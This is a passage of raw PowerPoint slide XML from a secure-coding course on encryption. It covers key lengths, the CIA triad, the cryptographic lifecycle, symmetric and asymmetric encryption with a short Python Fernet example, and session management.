              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More secure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More computationally expensive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different types of encryption need significantly different key lengths to be sufficiently secure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: 256-bit symmetric encryption is very secure, but key lengths around 2,048 are needed in asymmetric encryption for the same level of assurance.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encryption (Slide 3 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3690149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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can help you support the goals of the CIA Triad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the primary goal of encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of data can be ensured through encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Availability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> should be maintained when using encryption. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use encryption that is strong enough to protect the data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But the stronger encryption is, the longer it will take to decrypt. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This could prove inconvenient for some users, and impossible for others, based on their hardware. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whatever encryption you use, it shouldn't slow down performance unacceptably for most of your users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other uses for encryption include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non-repudiation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Digital Rights Management (DRM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Digital Signature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tunneling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses for Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1078251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ife cycle arrows png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="11531" t="10361" r="10057" b="9349"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="2514600"/>
            <a:ext cx="1800058"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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600199" y="1302040"/>
            <a:ext cx="7201875" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All cryptosystems eventually outlive their usefulness.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Unbreakable” algorithms succumb to new attacks, or improved computing power.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Electronic Frontier Foundation (EFF) created a DES Cracker machine for under $250,000 that could crack DES in 4.5 days.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WEP, a weak implementation of RC4 used for years in wireless devices, can now be broken by a single laptop in a matter of minutes, spawning a shift to WPA and WPA/2- based wireless security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One of the toughest algorithms today, 4096 bit RSA, was successfully broken into by using a microphone to listen to acoustic variations in the sound produced by a CPU while performing calculations with the algorithm. This "side channel" attack demonstrates that even strong encryption can have vulnerabilities in unexpected ways.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developers must never become complacent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A weak implementation of a good algorithm, or some currently unknown side channel attack, may be discovered and exploited.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cryptographic Lifecycle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="Image result for protec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04" y="2981325"/>
            <a:ext cx="7112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86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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Symmetric Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 331"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6015830" y="3848893"/>
            <a:ext cx="407988" cy="1228725"/>
            <a:chOff x="3353" y="2605"/>
            <a:chExt cx="257" cy="257"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Line 332"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3359" y="2605"/>
              <a:ext cx="0" cy="2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7" name="Line 333"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="3482" y="2476"/>
              <a:ext cx="0" cy="25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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 334"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="3077367" y="3925094"/>
            <a:ext cx="407987" cy="1143000"/>
            <a:chOff x="3353" y="2605"/>
            <a:chExt cx="257" cy="257"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Line 335"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3359" y="2605"/>
              <a:ext cx="0" cy="2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 name="Line 336"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="3482" y="2476"/>
              <a:ext cx="0" cy="25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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Box 307"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1673225" y="4073525"/>
            <a:ext cx="14906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100" dirty="0"/>
              <a:t>Encrypts Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Box 307"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5767387" y="4073525"/>
            <a:ext cx="14890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100" dirty="0"/>
              <a:t>Decrypts Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Box 306"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3395661" y="4527550"/>
            <a:ext cx="26860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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Same Key on Both Sides</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 2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96000" y="2895600"/>
            <a:ext cx="50703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content\093022\Cryptographic.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70350" y="2101850"/>
            <a:ext cx="750887"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312"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2870200" y="3563937"/>
            <a:ext cx="32019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7" name="Picture 1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00250" y="2895600"/>
            <a:ext cx="50703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2331170" y="3381057"/>
            <a:ext cx="756746" cy="36576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6457719" y="3380510"/>
            <a:ext cx="756746" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48749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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Symmetric Encryption Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36B991CD-6F7D-4AE5-9E5C-2068DF5078BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409700" y="1676400"/>
            <a:ext cx="6324600" cy="3139321"/>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pip install cryptography</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from cryptography.fernet import Fernet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>key = Fernet.generate_key()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cipher_suite = Fernet(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cipher_text = cipher_suite.encrypt(b"This is a super secret message.")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print(cipher_text)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plain_text=cipher_suite.decrypt(cipher_text)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print(plain_text)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408069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577F2-1AAC-4F3D-8948-A0A3D3E2D7F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure Session Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49B92BF5-BA1C-4DB2-8567-F9463CBDABA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In a secure application, these elements work together to provide a secure and efficient working environment for users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Ensures users are who they claim to be.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Ensures users only do things they are allowed to do.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Session Management</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Ensures that during a single session, users don't have to re-authenticate every time they want to do something.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Temporary Session ID:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is created when the user successfully authenticates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables sessions to be tracked for a particular user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is passed along with messages sent between the client and server to identify the authenticated user and session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Makes it so users don’t have to reauthenticate (log in) with each communication, to verify they are who they claim to be.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Might be intercepted in communications between the two parties, enabling a third party (an attacker) to impersonate the client or server (or both).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When writing code to manage sessions, it is easy to introduce security problems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To maintain security:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider using existing, time-tested session management frameworks for your own applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Follow the guidelines provided in this lesson.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Put limits on session length to reduce risk of CSRF.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EE9831A-1EB9-4F3A-A595-8EF3E6E47C44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2879244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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asymmetric Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Line 69"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6259512" y="4357688"/>
            <a:ext cx="498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Line 69"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="2208212" y="4367213"/>
            <a:ext cx="498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Text Box 307"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1585913" y="4573588"/>
            <a:ext cx="17430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100" dirty="0"/>
              <a:t>Public Key Encrypts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 307"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5483225" y="4573588"/>
            <a:ext cx="20494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100" dirty="0"/>
              <a:t>Private Key Decrypts</a:t>
            </a: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319213" y="2728913"/>
            <a:ext cx="50641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D:\content\093022\Cryptographic.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36913" y="2725738"/>
            <a:ext cx="750887"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29238" y="2738438"/>
            <a:ext cx="50641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D:\content\093022\doc.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91375" y="2713038"/>
            <a:ext cx="7429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9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1990725" y="3128963"/>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4" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4133850" y="3128963"/>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5" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="3128963"/>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6107750" y="3479483"/>
            <a:ext cx="756745" cy="36576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2079076" y="3481923"/>
            <a:ext cx="756746" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252414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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asymmetric Encryption Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D35DDACA-675B-49D0-ABFA-D39DD9C5BA34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="1295400"/>
            <a:ext cx="5766846" cy="4505759"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3622335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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
